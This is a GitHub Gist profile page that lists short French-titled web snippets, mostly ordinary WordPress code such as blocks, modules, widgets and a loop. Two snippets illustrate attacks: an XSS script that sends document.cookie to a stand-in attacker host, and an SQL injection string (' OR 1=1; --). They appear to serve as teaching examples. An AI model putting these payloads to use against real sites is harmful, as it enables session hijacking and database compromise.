Skip to content

Instantly share code, notes, and snippets.

View thierrypigot's full-sized avatar

Thierry Pigot thierrypigot

View GitHub Profile
@thierrypigot
thierrypigot / xss.html
Created March 14, 2023 14:08
Faille XSS (Cross site scripting)
<script>
var cookies = document.cookie;
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://www.attacker-site.com/steal.php?cookies=" + cookies, true);
xhr.send();
</script>
@thierrypigot
thierrypigot / functions.php
Created March 14, 2023 08:55
Injection SQL
' OR 1=1; --
@thierrypigot
thierrypigot / microformat.html
Created February 9, 2023 09:42
Microformat ou donnée structurée
<div class="vcard">
<h2>Nom de l'entreprise</h2>
<p>
Adresse : <span class="street-address">123 Main St</span>
<span class="locality">Ville</span>,
<span class="region">État</span>
<span class="postal-code">Code postal</span>
</p>
<p>
Téléphone : <span class="tel">(555) 555-5555</span>
@thierrypigot
thierrypigot / functions.php
Created December 28, 2022 10:38
Custom Gutenberg bloc
<?php
// Register the hero block
function register_hero_block() {
register_block_type('my-plugin/hero', array(
'render_callback' => 'render_hero_block',
'attributes' => array(
'title' => array(
'type' => 'string',
'default' => '',
),
@thierrypigot
thierrypigot / functions.php
Created December 28, 2022 10:36
Beaver builder custom module
<?php
if ( class_exists( 'FLBuilderModule' ) ) {
class Beaver_Builder_Custom_Module extends FLBuilderModule {
public function __construct() {
parent::__construct( array(
'name' => __( 'Custom Module', 'fl-builder' ),
'description' => __( 'A custom Beaver Builder module.', 'fl-builder' ),
'category' => __( 'My Custom Modules', 'fl-builder' ),
@thierrypigot
thierrypigot / functions.php
Created December 28, 2022 10:22
Plugin to add metabox, field to select a date and a shortcode to use this value in my content
<?php
/*
Plugin Name: Metabox Date Select
Plugin URI: https://example.com
Description: Plugin to add metabox, field to select a date and a shortcode to use this value in my content.
Version: 1.0
Author: Your Name
Author URI: https://example.com
License: GPL2
SELECT *
FROM wp_posts
WHERE post_title = "Mon titre d'article"
AND post_status = 'publish'
<?php
<?php if ( have_posts() ) : ?>
<?php while (have_posts() ) : the_post(); ?>
<h2><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></h2>
<?php the_content(); ?>
<?php endwhile; ?>
<?php endif; ?>
?>
@thierrypigot
thierrypigot / action.php
Created December 19, 2022 15:11
Code qui ajoute un widget supplémentaire à la zone de widgets
<?php
function add_my_widget() {
register_widget( 'My_Widget' );
}
add_action( 'widgets_init', 'add_my_widget' );
?>
@thierrypigot
thierrypigot / action.php
Created December 19, 2022 15:11
Code qui ajoute un message personnalisé à toutes les notifications
<?php
function my_notification_message( $message ) {
$message .= 'Ceci est mon message personnalisé.';
return $message;
}
add_action( 'wp_mail', 'my_notification_message' );
?>